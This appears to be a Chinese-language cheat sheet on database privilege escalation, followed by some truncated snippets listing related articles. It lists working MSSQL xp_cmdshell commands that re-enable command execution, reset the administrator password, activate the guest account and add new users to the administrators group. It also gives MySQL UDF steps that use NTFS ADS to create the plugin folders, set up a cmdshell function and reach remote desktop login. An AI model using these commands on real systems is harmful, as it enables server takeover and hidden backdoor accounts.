幾個命令
# 檢視是否存在 xp_cmdshell(返回非 0 即存在)
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
# 不存在的話可以新增
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int;
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll';
# 檢視是否開啟了 xp_cmdshell(試試命令是否能成功)
exec master..xp_cmdshell 'whoami';
利用 sa 連線到伺服器,然後執行命令
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;
提示成功
然後利用 sqltools 直接執行命令。
也可以用 sql 語句來執行命令,三種方式,一般都喜歡用第二種。
exec xp_cmdshell 'command';
exec master..xp_cmdshell 'command';
exec master.dbo.xp_cmdshell 'command';
修改 administrators 的密碼,比較方便
exec xp_cmdshell 'net user administrator test123...';
修改 guest 的許可權
exec xp_cmdshell 'net user guest test123...';
exec xp_cmdshell 'net user guest /active:yes';
exec xp_cmdshell 'net localgroup administrators guest /add';
新建使用者
exec master..xp_cmdshell 'net user test test123... /add';
exec master..xp_cmdshell 'net localgroup administrators test /add';
這一步和mysql
的版本有關係,不同版本上傳的路徑不一樣,沒有lib
檔案的話需要新建。
# 版本小於 5.1,上傳到系統目錄下
c:\\windows\\udf.dll
c:\\windows\\system32\\udf.dll
# 版本大於 5.1,上傳到安裝目錄下
%mysql%\\plugin\\udf.dll
# 查詢路徑,後面加 udf.dll 即可
select @@plugin_dir
# 常用
# 查詢使用者
select user()
# 查詢資料庫版本
select version()
# 查詢當前作業系統
select @@version_compile_os
# 查詢讀取資料庫路徑
select @@datadir
# 查詢mysql安裝路徑
select @@basedir
# 查詢 plugin 的路徑
select @@plugin_dir
create function cmdshell returns string soname 'udf.dll';
select cmdshell('ipconfig');
drop function cmdshell;
delete from mysql.func where name='cmdshell'
可以直接udf
提權工具搞,新建使用者然後直接 3389 即可。
使用ntfs ads
流建立lib、plugin
資料夾:
如果遇到 can't open shared library 的情況,
就需要把 udf.dll 匯出到 lib\plugin 目錄下才可以,但是預設情況下 plugin 不存在,就利用 ntfs ads 流來建立資料夾。
select @@basedir; //查詢mysql的目錄
select 'it is dll' into dumpfile 'c:\\program files\\mysql\\mysql server 5.1\\lib::$index_allocation'; //使用ntfs ads流建立lib目錄
select 'it is dll' into dumpfile 'c:\\program files\\mysql\\mysql server 5.1\\lib\\plugin::$index_allocation'; //利用ntfs ads再次建立plugin目錄
執行成功以後再進行匯出即可。
MySQL資料庫提權小結
這裡的前提是獲取了webshell是最為方便的,直接檢視資料庫的配置檔案即可,如 conn config data sql common inc等。上面的方法有個缺點,就是給當前 的資料庫使用者的許可權比較低 不是root許可權,不方便後面的一些操作,那麼就需要這第二種方法。安裝目錄為 data m...
滲透之 資料庫提權
啟用xp cmdshell use master exec sp configure show advanced options 1 reconfigure with override exec sp configure xp cmdshell 1 reconfigure with override...
MySQL資料庫提權小結
這裡的前提是獲取了webshell是最為方便的,直接檢視資料庫的配置檔案即可,如 conn config data sql common inc等。上面的方法有個缺點,就是給當前 的資料庫使用者的許可權比較低 不是root許可權,不方便後面的一些操作,那麼就需要這第二種方法。安裝目錄為 data m...